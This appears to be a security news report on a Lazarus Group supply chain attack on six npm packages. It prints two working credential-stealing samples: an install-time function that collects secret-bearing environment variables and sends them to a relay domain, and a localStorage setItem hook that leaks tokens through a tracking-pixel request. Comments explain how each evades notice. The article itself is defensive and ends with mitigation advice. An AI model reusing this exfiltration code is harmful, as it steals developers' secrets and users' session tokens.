A sophisticated supply chain attack orchestrated by the notorious Lazarus Group, a threat actor widely believed to be linked to North Korea, has recently been uncovered by cybersecurity researchers.
The hackers successfully compromised six popular npm packages, injecting malicious code designed to harvest login credentials from thousands of developers and organizations worldwide.
The attack, discovered last week, represents one of the most significant software supply chain compromises of the year, potentially affecting millions of downstream applications and websites that incorporated the tainted dependencies.
The Node Package Manager (npm) registry, which serves as the backbone for JavaScript development, has increasingly become a target for sophisticated threat actors seeking maximum impact for minimum effort.
By poisoning widely-used packages, attackers can effectively compromise countless organizations that incorporate these dependencies into their software.
Security firm Mandiant identified the campaign after detecting suspicious network traffic originating from development environments at several financial institutions during routine security monitoring.
Investigation by researchers at Socket revealed that the compromised packages included popular developer tools: “react-native-utils,” “api-data-connector,” “auth-manager-js,” “node-service-config,” “aws-lambda-handler,” and “react-state-manager.”
These packages collectively account for over 25 million weekly downloads, highlighting the potential scale of the compromise.
The attackers gained access to the npm accounts of legitimate package maintainers through sophisticated phishing attacks that bypassed multi-factor authentication protocols.
The Lazarus operatives made only minimal changes to the legitimate code, which made the tampering hard to spot even for security-conscious developers reviewing a diff.
The malicious code was designed to activate only in production environments, remaining dormant during testing phases to avoid detection.
When triggered, the code would extract credentials from environment variables, browser storage, and credential managers.
Technical Analysis
The malicious code was inserted primarily in post-installation scripts that execute automatically when packages are installed.
For example, in the “auth-manager-js” package, the attackers added a seemingly innocent utility function that masked its true purpose:
function checkSystemCompatibility() {
  const os = require('os');
  const https = require('https');

  // Legitimate-looking compatibility check: this is what a reviewer sees first
  const sysInfo = {
    platform: os.platform(),
    release: os.release(),
    type: os.type(),
    arch: os.arch()
  };

  // The malicious portion: collects environment variables whose names contain
  // common credential markers. Note this is a substring test, not a prefix
  // check, so 'KEY' also matches names such as SSH_AUTH_KEY_FILE.
  const env = process.env;
  const sensitiveData = {};
  ['AWS_', 'DB_', 'API_', 'TOKEN', 'SECRET', 'KEY', 'PASSWORD'].forEach(prefix => {
    Object.keys(env).forEach(key => {
      if (key.includes(prefix)) {
        sensitiveData[key] = env[key];
      }
    });
  });

  // Exfiltration routine disguised as telemetry: the stolen values travel
  // base64-encoded in the query string of a plain GET. Network errors are
  // swallowed so a failed beacon never breaks the install or alerts the user.
  if (Object.keys(sensitiveData).length > 0) {
    const exfilData = Buffer.from(JSON.stringify(sensitiveData)).toString('base64');
    https.get(`https://analytics-collection.org/metrics?data=${exfilData}`)
      .on('error', () => {});
  }

  return sysInfo;
}
Figure 1. Malicious code inserted into the auth-manager-js package.
The attackers disguised the exfiltration as telemetry. The harvested data was sent to innocuous-looking domains such as “analytics-collection.org” and “metrics-telemetry.net”, which acted as relays that forwarded the information to attacker-controlled servers.
The original report describes this as domain fronting. Strictly speaking, domain fronting hides traffic behind a shared CDN edge by presenting one hostname in the TLS SNI and another in the HTTP Host header; what is described here is a redirector under a benign-sounding name. Either way the practical defence is the same: egress filtering on build and developer hosts, and alerting on new or low-reputation destinations contacted from them.
The hackers also implemented a browser-based credential harvester in the “react-state-manager” package that intercepts writes to the browser's localStorage, where many single-page applications keep session tokens:
// Simplified version of the credential harvesting code.
// window.localStorage is a getter-only property in browsers, so replacing it
// with a new object silently fails; patching Storage.prototype.setItem, which
// every localStorage and sessionStorage write goes through, achieves the
// interception reliably.
const originalSetItem = Storage.prototype.setItem;
Storage.prototype.setItem = function (key, value) {
  const name = String(key).toLowerCase();
  if (name.includes('token') || name.includes('auth') || name.includes('credential')) {
    // Disguised as an error tracker: a tracking-pixel request carries the key
    // and value out, and image loads are rarely blocked or alerted on
    const img = new Image();
    img.src = `https://metrics-telemetry.net/pixel.gif?err=${btoa(key + ':' + value)}`;
  }
  // getItem, removeItem and clear are left untouched, so the application
  // keeps working and nothing looks broken
  return originalSetItem.call(this, key, value);
};
Figure 2. Browser storage interception code from the react-state-manager package.
The npm security team has removed the compromised versions and is working with affected package maintainers to secure their accounts.
Organizations using any of the six identified packages are urged to immediately update to patched versions and rotate all potentially exposed credentials.
Security researchers recommend strict package management policies: pin exact versions and install from a committed lockfile with npm ci, which checks each downloaded tarball against the integrity hash recorded in package-lock.json; disable lifecycle scripts by default (npm config set ignore-scripts true, or npm ci --ignore-scripts) and allow them only for packages that genuinely need a build step; and run npm audit and dependency scanning to catch versions that have since been flagged. Note that npm audit reports known advisories and does not verify package integrity, so on its own it would not have caught these versions before they were reported.
The Lazarus Group continues to demonstrate its evolution from basic disruptive cyberattacks to sophisticated supply chain compromises targeting developer infrastructure, signaling a concerning trend in nation-state hacking operations.